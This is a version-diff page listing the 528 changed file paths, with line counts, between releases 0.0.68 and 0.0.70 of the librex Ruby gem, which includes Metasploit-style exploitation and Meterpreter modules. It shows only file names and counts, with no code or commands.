RubyGems - librex - Versions diffs - 0.0.68 → 0.0.70 - Mend

librex 0.0.68 → 0.0.70

Files changed (528) hide show

checksums.yaml +15 -0
data/README.markdown +1 -1
data/Rakefile +18 -16
data/lib/rex.rb +14 -10
data/lib/rex/LICENSE +2 -2
data/lib/rex/arch.rb +76 -76
data/lib/rex/arch/sparc.rb +57 -58
data/lib/rex/arch/x86.rb +506 -496
data/lib/rex/assembly/nasm.rb +83 -84
data/lib/rex/compat.rb +228 -173
data/lib/rex/constants.rb +47 -37
data/lib/rex/elfparsey.rb +0 -3
data/lib/rex/elfparsey/elf.rb +107 -110
data/lib/rex/elfparsey/elfbase.rb +244 -247
data/lib/rex/elfparsey/exceptions.rb +0 -3
data/lib/rex/elfscan.rb +0 -3
data/lib/rex/elfscan/scanner.rb +184 -166
data/lib/rex/elfscan/search.rb +35 -38
data/lib/rex/encoder/alpha2.rb +1 -2
data/lib/rex/encoder/alpha2/alpha_mixed.rb +52 -53
data/lib/rex/encoder/alpha2/alpha_upper.rb +62 -63
data/lib/rex/encoder/alpha2/generic.rb +77 -78
data/lib/rex/encoder/alpha2/unicode_mixed.rb +101 -97
data/lib/rex/encoder/alpha2/unicode_upper.rb +106 -107
data/lib/rex/encoder/bloxor/bloxor.rb +326 -0
data/lib/rex/encoder/ndr.rb +68 -68
data/lib/rex/encoder/nonalpha.rb +50 -51
data/lib/rex/encoder/nonupper.rb +50 -51
data/lib/rex/encoder/xdr.rb +78 -78
data/lib/rex/encoder/xor.rb +52 -53
data/lib/rex/encoder/xor/dword.rb +1 -2
data/lib/rex/encoder/xor/dword_additive.rb +1 -2
data/lib/rex/encoders/xor_dword.rb +17 -18
data/lib/rex/encoders/xor_dword_additive.rb +35 -36
data/lib/rex/encoding/xor.rb +0 -1
data/lib/rex/encoding/xor/byte.rb +3 -4
data/lib/rex/encoding/xor/dword.rb +3 -4
data/lib/rex/encoding/xor/dword_additive.rb +72 -73
data/lib/rex/encoding/xor/exceptions.rb +2 -3
data/lib/rex/encoding/xor/generic.rb +129 -130
data/lib/rex/encoding/xor/qword.rb +3 -4
data/lib/rex/encoding/xor/word.rb +3 -4
data/lib/rex/exceptions.rb +100 -101
data/lib/rex/exploitation/cmdstager.rb +3 -3
data/lib/rex/exploitation/cmdstager/base.rb +170 -156
data/lib/rex/exploitation/cmdstager/bourne.rb +105 -0
data/lib/rex/exploitation/cmdstager/debug_asm.rb +110 -113
data/lib/rex/exploitation/cmdstager/debug_write.rb +106 -109
data/lib/rex/exploitation/cmdstager/echo.rb +164 -0
data/lib/rex/exploitation/cmdstager/printf.rb +122 -0
data/lib/rex/exploitation/cmdstager/tftp.rb +34 -27
data/lib/rex/exploitation/cmdstager/vbs.rb +95 -98
data/lib/rex/exploitation/egghunter.rb +359 -346
data/lib/rex/exploitation/encryptjs.rb +60 -60
data/lib/rex/exploitation/heaplib.rb +76 -76
data/lib/rex/exploitation/js.rb +6 -0
data/lib/rex/exploitation/js/detect.rb +69 -0
data/lib/rex/exploitation/js/memory.rb +81 -0
data/lib/rex/exploitation/js/network.rb +84 -0
data/lib/rex/exploitation/js/utils.rb +33 -0
data/lib/rex/exploitation/jsobfu.rb +448 -424
data/lib/rex/exploitation/obfuscatejs.rb +301 -301
data/lib/rex/exploitation/omelet.rb +257 -257
data/lib/rex/exploitation/opcodedb.rb +699 -699
data/lib/rex/exploitation/ropdb.rb +189 -0
data/lib/rex/exploitation/seh.rb +68 -68
data/lib/rex/file.rb +96 -49
data/lib/rex/image_source.rb +0 -3
data/lib/rex/image_source/disk.rb +45 -48
data/lib/rex/image_source/image_source.rb +33 -36
data/lib/rex/image_source/memory.rb +17 -20
data/lib/rex/io/bidirectional_pipe.rb +118 -115
data/lib/rex/io/datagram_abstraction.rb +13 -14
data/lib/rex/io/ring_buffer.rb +273 -273
data/lib/rex/io/stream.rb +284 -284
data/lib/rex/io/stream_abstraction.rb +183 -181
data/lib/rex/io/stream_server.rb +193 -193
data/lib/rex/job_container.rb +167 -167
data/lib/rex/logging.rb +0 -1
data/lib/rex/logging/log_dispatcher.rb +113 -113
data/lib/rex/logging/log_sink.rb +17 -17
data/lib/rex/logging/sinks/flatfile.rb +36 -36
data/lib/rex/logging/sinks/stderr.rb +27 -27
data/lib/rex/mac_oui.rb +16572 -16571
data/lib/rex/machparsey.rb +0 -1
data/lib/rex/machparsey/exceptions.rb +0 -1
data/lib/rex/machparsey/mach.rb +160 -161
data/lib/rex/machparsey/machbase.rb +367 -368
data/lib/rex/machscan.rb +0 -1
data/lib/rex/machscan/scanner.rb +175 -176
data/lib/rex/mime/encoding.rb +17 -0
data/lib/rex/mime/header.rb +58 -58
data/lib/rex/mime/message.rb +140 -137
data/lib/rex/mime/part.rb +41 -12
data/lib/rex/nop/opty2.rb +90 -90
data/lib/rex/nop/opty2_tables.rb +273 -273
data/lib/rex/ole.rb +0 -4
data/lib/rex/ole/clsid.rb +26 -30
data/lib/rex/ole/difat.rb +121 -125
data/lib/rex/ole/directory.rb +205 -209
data/lib/rex/ole/direntry.rb +217 -221
data/lib/rex/ole/fat.rb +79 -83
data/lib/rex/ole/header.rb +178 -182
data/lib/rex/ole/minifat.rb +49 -53
data/lib/rex/ole/propset.rb +113 -117
data/lib/rex/ole/samples/create_ole.rb +8 -9
data/lib/rex/ole/samples/dir.rb +10 -11
data/lib/rex/ole/samples/dump_stream.rb +14 -15
data/lib/rex/ole/samples/ole_info.rb +5 -6
data/lib/rex/ole/storage.rb +372 -376
data/lib/rex/ole/stream.rb +33 -37
data/lib/rex/ole/substorage.rb +20 -24
data/lib/rex/ole/util.rb +137 -141
data/lib/rex/parser/acunetix_nokogiri.rb +398 -398
data/lib/rex/parser/apple_backup_manifestdb.rb +116 -116
data/lib/rex/parser/appscan_nokogiri.rb +359 -359
data/lib/rex/parser/arguments.rb +88 -88
data/lib/rex/parser/burp_session_nokogiri.rb +258 -258
data/lib/rex/parser/ci_nokogiri.rb +184 -184
data/lib/rex/parser/foundstone_nokogiri.rb +334 -333
data/lib/rex/parser/fusionvm_nokogiri.rb +94 -94
data/lib/rex/parser/ini.rb +167 -167
data/lib/rex/parser/ip360_aspl_xml.rb +84 -84
data/lib/rex/parser/ip360_xml.rb +77 -77
data/lib/rex/parser/mbsa_nokogiri.rb +224 -224
data/lib/rex/parser/nessus_xml.rb +100 -100
data/lib/rex/parser/netsparker_xml.rb +89 -75
data/lib/rex/parser/nexpose_raw_nokogiri.rb +677 -677
data/lib/rex/parser/nexpose_simple_nokogiri.rb +322 -322
data/lib/rex/parser/nexpose_xml.rb +105 -105
data/lib/rex/parser/nmap_nokogiri.rb +386 -386
data/lib/rex/parser/nmap_xml.rb +116 -116
data/lib/rex/parser/nokogiri_doc_mixin.rb +223 -221
data/lib/rex/parser/openvas_nokogiri.rb +162 -162
data/lib/rex/parser/outpost24_nokogiri.rb +239 -0
data/lib/rex/parser/retina_xml.rb +90 -90
data/lib/rex/parser/unattend.rb +171 -0
data/lib/rex/parser/wapiti_nokogiri.rb +89 -89
data/lib/rex/payloads/win32/common.rb +14 -14
data/lib/rex/payloads/win32/kernel.rb +36 -36
data/lib/rex/payloads/win32/kernel/common.rb +32 -32
data/lib/rex/payloads/win32/kernel/recovery.rb +27 -27
data/lib/rex/payloads/win32/kernel/stager.rb +170 -170
data/lib/rex/peparsey.rb +0 -3
data/lib/rex/peparsey/exceptions.rb +0 -3
data/lib/rex/peparsey/pe.rb +196 -199
data/lib/rex/peparsey/pe_memdump.rb +35 -38
data/lib/rex/peparsey/pebase.rb +1633 -1652
data/lib/rex/peparsey/section.rb +115 -124
data/lib/rex/pescan.rb +0 -3
data/lib/rex/pescan/analyze.rb +351 -351
data/lib/rex/pescan/scanner.rb +182 -182
data/lib/rex/pescan/search.rb +59 -59
data/lib/rex/platforms/windows.rb +37 -37
data/lib/rex/poly.rb +111 -110
data/lib/rex/poly/block.rb +419 -417
data/lib/rex/poly/machine.rb +12 -0
data/lib/rex/poly/machine/machine.rb +829 -0
data/lib/rex/poly/machine/x86.rb +508 -0
data/lib/rex/poly/register.rb +70 -70
data/lib/rex/poly/register/x86.rb +22 -22
data/lib/rex/post.rb +0 -1
data/lib/rex/post/dir.rb +35 -36
data/lib/rex/post/file.rb +140 -141
data/lib/rex/post/file_stat.rb +198 -199
data/lib/rex/post/io.rb +167 -168
data/lib/rex/post/meterpreter.rb +1 -1
data/lib/rex/post/meterpreter/channel.rb +389 -390
data/lib/rex/post/meterpreter/channel_container.rb +33 -34
data/lib/rex/post/meterpreter/channels/pool.rb +129 -130
data/lib/rex/post/meterpreter/channels/pools/file.rb +35 -36
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +72 -73
data/lib/rex/post/meterpreter/channels/stream.rb +62 -63
data/lib/rex/post/meterpreter/client.rb +442 -436
data/lib/rex/post/meterpreter/client_core.rb +326 -310
data/lib/rex/post/meterpreter/dependencies.rb +0 -1
data/lib/rex/post/meterpreter/extension.rb +12 -13
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +35 -36
data/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +71 -0
data/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +169 -0
data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +45 -0
data/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +104 -0
data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +77 -0
data/lib/rex/post/meterpreter/extensions/extapi/window/window.rb +56 -0
data/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +75 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +70 -71
data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +361 -0
data/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +76 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb +78 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +22 -78
data/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb +49 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +4 -4
data/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +128 -0
data/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +38 -39
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +1 -1
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +95 -96
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +39 -40
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +80 -85
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +94 -95
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +207 -147
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +258 -259
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +366 -301
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +72 -73
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +24 -25
data/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +59 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +227 -149
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +107 -108
data/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb +106 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +41 -42
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +102 -101
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +151 -152
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +142 -142
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +185 -185
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +38118 -38117
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +7 -7
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +2086 -2084
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb +15 -15
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +80 -80
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3835 -3833
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +84 -28
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +151 -137
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +15 -6
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3155 -3155
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_version.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb +70 -70
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +128 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +596 -596
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +310 -301
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +71 -61
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +100 -100
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb +14 -14
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb +488 -488
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +273 -264
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb +5 -5
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +240 -238
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +17 -15
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb +61 -61
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +654 -635
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +49 -49
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +103 -102
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +98 -68
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +165 -166
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +16 -17
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +34 -36
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +363 -364
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +102 -103
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +28 -29
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +303 -304
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +113 -114
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +260 -261
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +165 -166
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +69 -70
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +160 -161
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +143 -144
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +29 -12
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +230 -231
data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +181 -44
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +12 -13
data/lib/rex/post/meterpreter/object_aliases.rb +56 -57
data/lib/rex/post/meterpreter/packet.rb +591 -592
data/lib/rex/post/meterpreter/packet_dispatcher.rb +506 -496
data/lib/rex/post/meterpreter/packet_parser.rb +72 -73
data/lib/rex/post/meterpreter/packet_response_waiter.rb +56 -57
data/lib/rex/post/meterpreter/ui/console.rb +112 -112
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +53 -53
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +911 -854
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +86 -86
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +65 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +198 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +444 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +199 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb +118 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +220 -220
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +509 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks.rb +60 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +254 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +159 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +182 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +173 -173
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +40 -40
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +75 -77
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +30 -30
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +105 -105
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +182 -182
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +37 -37
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +504 -482
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +401 -330
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +883 -581
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +296 -299
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +320 -153
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +78 -78
data/lib/rex/post/permission.rb +0 -1
data/lib/rex/post/process.rb +39 -40
data/lib/rex/post/thread.rb +41 -42
data/lib/rex/post/ui.rb +35 -36
data/lib/rex/proto/addp.rb +218 -0
data/lib/rex/proto/dcerpc/client.rb +344 -344
data/lib/rex/proto/dcerpc/exceptions.rb +128 -128
data/lib/rex/proto/dcerpc/handle.rb +32 -32
data/lib/rex/proto/dcerpc/ndr.rb +56 -56
data/lib/rex/proto/dcerpc/packet.rb +249 -245
data/lib/rex/proto/dcerpc/response.rb +170 -170
data/lib/rex/proto/dcerpc/uuid.rb +65 -65
data/lib/rex/proto/dcerpc/wdscp.rb +3 -0
data/lib/rex/proto/dcerpc/wdscp/constants.rb +89 -0
data/lib/rex/proto/dcerpc/wdscp/packet.rb +94 -0
data/lib/rex/proto/dhcp.rb +0 -1
data/lib/rex/proto/dhcp/constants.rb +0 -1
data/lib/rex/proto/dhcp/server.rb +303 -304
data/lib/rex/proto/drda/constants.rb +1 -1
data/lib/rex/proto/drda/packet.rb +186 -186
data/lib/rex/proto/drda/utils.rb +104 -104
data/lib/rex/proto/http.rb +1 -0
data/lib/rex/proto/http/client.rb +692 -820
data/lib/rex/proto/http/client_request.rb +472 -0
data/lib/rex/proto/http/handler.rb +25 -25
data/lib/rex/proto/http/handler/erb.rb +104 -104
data/lib/rex/proto/http/handler/proc.rb +37 -37
data/lib/rex/proto/http/header.rb +149 -149
data/lib/rex/proto/http/packet.rb +388 -382
data/lib/rex/proto/http/request.rb +332 -335
data/lib/rex/proto/http/response.rb +132 -72
data/lib/rex/proto/http/server.rb +348 -338
data/lib/rex/proto/iax2/call.rb +310 -310
data/lib/rex/proto/iax2/client.rb +197 -197
data/lib/rex/proto/iax2/codecs/alaw.rb +4 -4
data/lib/rex/proto/iax2/codecs/mulaw.rb +4 -4
data/lib/rex/proto/ipmi.rb +57 -0
data/lib/rex/proto/ipmi/channel_auth_reply.rb +88 -0
data/lib/rex/proto/ipmi/open_session_reply.rb +35 -0
data/lib/rex/proto/ipmi/rakp2.rb +35 -0
data/lib/rex/proto/ipmi/utils.rb +125 -0
data/lib/rex/proto/natpmp.rb +1 -5
data/lib/rex/proto/natpmp/constants.rb +4 -4
data/lib/rex/proto/natpmp/packet.rb +25 -25
data/lib/rex/proto/ntlm/base.rb +271 -271
data/lib/rex/proto/ntlm/constants.rb +61 -61
data/lib/rex/proto/ntlm/crypt.rb +348 -352
data/lib/rex/proto/ntlm/exceptions.rb +3 -3
data/lib/rex/proto/ntlm/message.rb +468 -471
data/lib/rex/proto/ntlm/utils.rb +746 -746
data/lib/rex/proto/pjl.rb +30 -0
data/lib/rex/proto/pjl/client.rb +162 -0
data/lib/rex/proto/proxy/socks4a.rb +440 -440
data/lib/rex/proto/rfb.rb +1 -8
data/lib/rex/proto/rfb/cipher.rb +46 -49
data/lib/rex/proto/rfb/client.rb +179 -182
data/lib/rex/proto/rfb/constants.rb +18 -21
data/lib/rex/proto/smb/client.rb +1954 -1843
data/lib/rex/proto/smb/constants.rb +533 -516
data/lib/rex/proto/smb/crypt.rb +21 -21
data/lib/rex/proto/smb/evasions.rb +43 -43
data/lib/rex/proto/smb/exceptions.rb +791 -791
data/lib/rex/proto/smb/simpleclient.rb +142 -286
data/lib/rex/proto/smb/simpleclient/open_file.rb +106 -0
data/lib/rex/proto/smb/simpleclient/open_pipe.rb +57 -0
data/lib/rex/proto/smb/utils.rb +81 -81
data/lib/rex/proto/sunrpc/client.rb +158 -158
data/lib/rex/proto/tftp.rb +0 -1
data/lib/rex/proto/tftp/client.rb +289 -289
data/lib/rex/proto/tftp/constants.rb +9 -10
data/lib/rex/proto/tftp/server.rb +466 -467
data/lib/rex/random_identifier_generator.rb +176 -0
data/lib/rex/registry.rb +1 -1
data/lib/rex/registry/hive.rb +88 -88
data/lib/rex/registry/lfkey.rb +25 -25
data/lib/rex/registry/nodekey.rb +30 -30
data/lib/rex/registry/regf.rb +10 -10
data/lib/rex/registry/valuekey.rb +43 -43
data/lib/rex/registry/valuelist.rb +13 -13
data/lib/rex/ropbuilder/rop.rb +254 -253
data/lib/rex/script.rb +21 -22
data/lib/rex/script/base.rb +51 -50
data/lib/rex/script/meterpreter.rb +2 -2
data/lib/rex/service.rb +24 -24
data/lib/rex/service_manager.rb +132 -132
data/lib/rex/services/local_relay.rb +398 -398
data/lib/rex/socket.rb +758 -763
data/lib/rex/socket/comm.rb +95 -95
data/lib/rex/socket/comm/local.rb +507 -440
data/lib/rex/socket/ip.rb +118 -118
data/lib/rex/socket/parameters.rb +351 -350
data/lib/rex/socket/range_walker.rb +445 -368
data/lib/rex/socket/ssl_tcp.rb +323 -317
data/lib/rex/socket/ssl_tcp_server.rb +173 -158
data/lib/rex/socket/subnet_walker.rb +48 -48
data/lib/rex/socket/switch_board.rb +259 -259
data/lib/rex/socket/tcp.rb +58 -56
data/lib/rex/socket/tcp_server.rb +42 -42
data/lib/rex/socket/udp.rb +152 -152
data/lib/rex/sslscan/result.rb +200 -0
data/lib/rex/sslscan/scanner.rb +205 -0
data/lib/rex/struct2.rb +0 -1
data/lib/rex/struct2/c_struct.rb +162 -163
data/lib/rex/struct2/c_struct_template.rb +21 -22
data/lib/rex/struct2/constant.rb +6 -7
data/lib/rex/struct2/element.rb +30 -31
data/lib/rex/struct2/generic.rb +60 -61
data/lib/rex/struct2/restraint.rb +40 -41
data/lib/rex/struct2/s_string.rb +60 -61
data/lib/rex/struct2/s_struct.rb +97 -98
data/lib/rex/sync.rb +0 -1
data/lib/rex/sync/event.rb +62 -72
data/lib/rex/sync/read_write_lock.rb +149 -149
data/lib/rex/sync/ref.rb +42 -42
data/lib/rex/sync/thread_safe.rb +59 -59
data/lib/rex/text.rb +1803 -1315
data/lib/rex/thread_factory.rb +25 -25
data/lib/rex/time.rb +44 -44
data/lib/rex/transformer.rb +91 -91
data/lib/rex/ui/interactive.rb +265 -265
data/lib/rex/ui/output.rb +66 -60
data/lib/rex/ui/progress_tracker.rb +79 -79
data/lib/rex/ui/subscriber.rb +144 -134
data/lib/rex/ui/text/color.rb +76 -76
data/lib/rex/ui/text/dispatcher_shell.rb +512 -505
data/lib/rex/ui/text/input.rb +96 -96
data/lib/rex/ui/text/input/buffer.rb +58 -58
data/lib/rex/ui/text/input/readline.rb +114 -114
data/lib/rex/ui/text/input/socket.rb +77 -77
data/lib/rex/ui/text/input/stdio.rb +24 -24
data/lib/rex/ui/text/irb_shell.rb +45 -41
data/lib/rex/ui/text/output.rb +64 -60
data/lib/rex/ui/text/output/buffer.rb +42 -42
data/lib/rex/ui/text/output/buffer/stdout.rb +25 -0
data/lib/rex/ui/text/output/file.rb +24 -24
data/lib/rex/ui/text/output/socket.rb +24 -24
data/lib/rex/ui/text/output/stdio.rb +29 -29
data/lib/rex/ui/text/output/tee.rb +36 -36
data/lib/rex/ui/text/progress_tracker.rb +37 -37
data/lib/rex/ui/text/shell.rb +371 -361
data/lib/rex/ui/text/table.rb +320 -284
data/lib/rex/zip.rb +0 -1
data/lib/rex/zip/archive.rb +115 -94
data/lib/rex/zip/blocks.rb +101 -100
data/lib/rex/zip/entry.rb +108 -99
data/lib/rex/zip/jar.rb +261 -206
data/lib/rex/zip/samples/comment.rb +1 -2
data/lib/rex/zip/samples/mkwar.rb +12 -13
data/lib/rex/zip/samples/mkzip.rb +1 -2
data/lib/rex/zip/samples/recursive.rb +29 -30
metadata +424 -446
data/lib/rex/arch/sparc.rb.ut.rb +0 -19
data/lib/rex/arch/x86.rb.ut.rb +0 -94
data/lib/rex/assembly/nasm.rb.ut.rb +0 -23
data/lib/rex/encoder/ndr.rb.ut.rb +0 -45
data/lib/rex/encoder/xdr.rb.ut.rb +0 -30
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -13
data/lib/rex/encoding/xor.rb.ts.rb +0 -15
data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -22
data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -16
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -16
data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -121
data/lib/rex/encoding/xor/word.rb.ut.rb +0 -14
data/lib/rex/exceptions.rb.ut.rb +0 -45
data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -28
data/lib/rex/exploitation/javascriptosdetect.js +0 -1014
data/lib/rex/exploitation/javascriptosdetect.rb +0 -43
data/lib/rex/exploitation/omelet.rb.ut.rb +0 -27
data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -280
data/lib/rex/exploitation/seh.rb.ut.rb +0 -20
data/lib/rex/file.rb.ut.rb +0 -17
data/lib/rex/io/ring_buffer.rb.ut.rb +0 -135
data/lib/rex/nop/opty2.rb.ut.rb +0 -24
data/lib/rex/parser/arguments.rb.ut.rb +0 -68
data/lib/rex/parser/ini.rb.ut.rb +0 -30
data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -18
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -39
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -37
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb +0 -52
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -43
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -128
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb +0 -64
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb +0 -29
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb +0 -155
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb +0 -128
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -124
data/lib/rex/proto.rb.ts.rb +0 -9
data/lib/rex/proto/dcerpc.rb.ts.rb +0 -10
data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -492
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -86
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -42
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -57
data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -16
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -47
data/lib/rex/proto/drda.rb.ts.rb +0 -18
data/lib/rex/proto/drda/constants.rb.ut.rb +0 -24
data/lib/rex/proto/drda/packet.rb.ut.rb +0 -110
data/lib/rex/proto/drda/utils.rb.ut.rb +0 -85
data/lib/rex/proto/http.rb.ts.rb +0 -13
data/lib/rex/proto/http/client.rb.ut.rb +0 -96
data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -22
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -25
data/lib/rex/proto/http/header.rb.ut.rb +0 -47
data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
data/lib/rex/proto/http/request.rb.ut.rb +0 -215
